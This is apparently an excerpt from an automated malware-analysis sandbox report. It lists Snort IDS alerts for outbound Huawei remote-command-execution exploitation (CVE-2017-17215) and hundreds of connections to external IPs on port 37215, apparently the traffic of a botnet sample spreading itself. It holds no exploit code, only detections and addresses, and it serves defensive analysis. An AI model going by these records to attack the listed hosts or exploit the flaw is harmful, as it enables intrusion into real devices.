              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37498 -> 41.8.155.166:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40684 -> 156.79.215.74:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40684 -> 156.79.215.74:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53442 -> 197.214.162.178:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53442 -> 197.214.162.178:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54070 -> 197.187.123.53:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54070 -> 197.187.123.53:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57920 -> 197.203.191.169:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57920 -> 197.203.191.169:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48138 -> 41.194.164.164:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48138 -> 41.194.164.164:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47372 -> 41.203.39.0:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47372 -> 41.203.39.0:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50122 -> 41.75.255.42:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50122 -> 41.75.255.42:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50982 -> 41.115.248.106:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50982 -> 41.115.248.106:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39370 -> 156.163.66.215:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39370 -> 156.163.66.215:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42576 -> 156.98.225.29:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42576 -> 156.98.225.29:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48920 -> 156.144.135.207:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48920 -> 156.144.135.207:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57160 -> 197.224.67.201:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57160 -> 197.224.67.201:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55946 -> 41.156.160.87:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55946 -> 41.156.160.87:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55014 -> 156.203.51.107:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55014 -> 156.203.51.107:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33178 -> 156.195.180.29:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33178 -> 156.195.180.29:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44392 -> 197.246.165.36:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44392 -> 197.246.165.36:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52918 -> 156.86.41.94:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52918 -> 156.86.41.94:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57098 -> 156.102.232.222:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57098 -> 156.102.232.222:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39598 -> 156.70.232.219:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39598 -> 156.70.232.219:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48668 -> 41.158.26.48:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48668 -> 41.158.26.48:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36202 -> 156.143.209.83:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36202 -> 156.143.209.83:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60132 -> 41.107.231.137:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60132 -> 41.107.231.137:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46776 -> 197.154.74.163:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46776 -> 197.154.74.163:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47950 -> 197.112.192.179:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47950 -> 197.112.192.179:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60050 -> 41.154.194.136:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60050 -> 41.154.194.136:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42116 -> 41.107.23.150:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42116 -> 41.107.23.150:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57552 -> 41.189.90.134:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57552 -> 41.189.90.134:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33454 -> 156.44.92.123:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33454 -> 156.44.92.123:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42464 -> 41.218.55.199:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42464 -> 41.218.55.199:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37486 -> 197.117.53.251:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37486 -> 197.117.53.251:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50514 -> 41.148.32.215:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50514 -> 41.148.32.215:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50550 -> 197.205.237.132:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50550 -> 197.205.237.132:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43452 -> 156.155.54.24:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43452 -> 156.155.54.24:37215
              Source: global trafficTCP traffic: 156.64.133.141 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.219.226.214 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.203.39.0 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.175.224.38 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.89.186.115 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.78.131.109 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.65.174.17 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.115.248.106 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.252.191.201 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.144.239.133 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.48.44.114 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.216.57.211 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.137.90.160 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.207.130.124 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.211.164.49 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.220.170.126 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.2.27.218 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.14.1.85 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.82.75.9 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.209.151.245 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.139.143.212 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.15.76.55 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.230.229.98 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.251.185.162 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.145.154.253 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.148.174.163 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.220.138.129 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.165.76.209 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.94.212.191 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.223.100.137 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.95.146.5 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.100.208.225 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.161.235.104 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.102.25.34 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.40.22.39 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.170.117.106 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.151.60.93 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.161.127.92 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.180.35.86 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.126.31.120 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.128.149.86 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.118.1.139 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.0.119.130 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.79.223.191 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.179.113.114 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.46.236.126 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.102.59.166 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.172.177.215 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.44.84.112 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.87.162.197 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.17.85.190 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.78.135.255 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.45.190.231 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.189.211.206 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.62.89.103 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.74.86.116 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.38.225.89 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.224.208.197 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.25.251.208 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.227.127.133 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.95.172.98 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.188.19.114 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.217.112.178 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.98.225.29 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.33.238.134 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.37.22.33 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.174.140.61 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.138.222.185 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.8.46.108 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.206.99.218 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.13.175.64 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.33.8.207 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.3.237.232 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.61.117.129 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.216.251.19 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.198.106.25 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.213.239.62 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.122.188.250 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.211.164.13 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.191.222.90 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.184.148.27 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.126.99.219 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.93.168.43 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.112.8.24 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.209.60.71 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.171.201.221 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.93.196.251 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.154.194.136 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.225.156.184 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.109.114.102 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.98.18.98 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.249.24.102 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.99.39.244 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.167.151.240 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.45.39.139 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.177.28.10 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.32.122.207 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.238.222.107 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.159.91.0 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.252.252.230 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.29.99.140 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.254.251.236 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.0.208.185 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.107.23.150 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.32.105.53 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.208.236.211 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.218.55.199 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.91.7.192 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.8.7.247 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.255.240.158 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.178.221.71 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.87.247.69 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.7.165.176 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.112.241.178 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.165.241.236 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.206.120.106 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.73.208.73 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.109.210.7 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.195.196.140 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.175.159.181 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.181.170.247 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.183.22.171 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.23.17.96 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.222.9.65 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.8.213.120 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.8.169.118 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.117.58.200 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.75.113.17 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.102.62.53 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.92.27.0 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.128.20.245 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.146.134.6 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.180.31.80 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.253.1.253 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.8.6.36 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.117.53.251 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.208.241.102 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.21.159.200 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.91.46.56 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.243.200.154 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.54.227.110 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.144.57.76 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.24.35.193 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.87.33.240 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.41.250.224 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.49.155.193 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.111.190.191 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.62.52.162 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.8.81.143 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.98.170.196 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.26.181.224 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.162.16.194 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.69.12.126 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.250.246.86 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.153.23.133 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.99.68.176 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.232.82.26 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.25.0.100 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.253.221.236 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.235.26.115 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.138.186.159 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.174.148.185 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.247.199.134 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.7.174.174 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.35.45.134 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.107.159.226 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.124.250.145 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.95.142.7 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.61.146.33 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.39.14.181 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.30.13.4 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.149.160.150 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.51.73.140 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.196.65.70 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.113.7.72 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.160.194.101 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.170.30.183 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.81.243.146 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.201.157.105 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.172.226.152 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.116.183.242 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.38.41.192 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.230.52.172 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.43.162.163 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.226.89.160 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.198.13.88 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.233.113.8 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.82.84.128 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.138.63.195 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.115.1.221 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.241.25.6 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.25.170.77 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.253.22.172 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.103.12.224 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.188.218.116 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.30.80.56 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.138.162.225 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.182.139.161 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.136.231.200 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.65.222.54 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.70.159.207 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.156.43.198 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.133.36.111 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.175.146.61 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.16.175.101 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.103.81.12 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.208.31.66 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.146.124.234 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.147.146.83 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.255.131.213 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.75.255.42 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.80.177.106 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.54.176.241 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.1.138.117 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.15.134.113 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.132.151.48 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.86.45.50 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.158.97.75 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.218.4.34 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.218.26.77 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.0.201.93 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.36.193.183 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.105.95.62 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.136.120.179 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.215.46.148 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.167.21.178 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.6.83.65 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.58.11.159 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.148.5.11 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 197.109.98.211 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.183.181.5 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.234.131.16 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.3.135.97 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.170.24.175 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 156.28.204.125 ports 1,2,3,5,7,37215
